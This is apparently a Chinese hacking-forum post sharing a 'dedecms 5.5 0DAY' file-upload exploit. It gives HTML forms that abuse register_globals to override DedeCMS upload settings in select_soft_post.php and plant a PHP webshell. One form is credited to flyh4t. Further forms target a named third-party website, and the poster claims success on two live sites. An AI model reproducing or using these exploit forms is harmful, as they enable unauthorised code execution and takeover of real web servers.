dedecms 5.5 0DAY dedecms

柔肠寸断

需要register_globals=on
<html><head><title>dedecms v55 upload poc by flyh4t</title></head>
<body>
<form action=http://127.0.0.1/include/dialog/select_soft_post.php method='post'

enctype="multipart/form-data" name='myform'>
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.en-closure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
select u shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br>ndde register_globals=on...
<br>
<br>webshell at /data/cache/fly.php...<br>
</body></html>
--------------------------------------------------------------------------------
漏洞是存在的,但网上用此版本的比较少,有都好像补了?试了两个也成功了!

<form action='http://www.mengtesuoli.com/include/dialog/select_soft_post.php?cfg_basedir=../../include/dialog/img&cfg_imgtype=php&cfg_soft_dir=m&newname=kak.php&cfg_not_allowall=ff&cfg_softtype=php&cfg_mediatype=php' method='post' name='form1' enctype='multipart/form-data'>

<input name='uploadfile' type='FILE' class='FileButton' size='28'>
<input type='submit' name='Submit' value='开始上传'>
</form>

shell地址在include/dialog/img/kak.php



=============================================================================================

利用脚本，以下保存html格式



<form action='http://www.mengtesuoli.com/include/dialog/select_soft_post.php?cfg_basedir=../../include/dialog/img&cfg_imgtype=php&cfg_soft_dir=m&newname=kak.php&cfg_not_allowall=ff&cfg_softtype=php&cfg_mediatype=php' method='post' name='form1' enctype='multipart/form-data'>

<input name='uploadfile' type='FILE' class='FileButton' size='28'>
<input type='submit' name='Submit' value='开始上传'>
</form>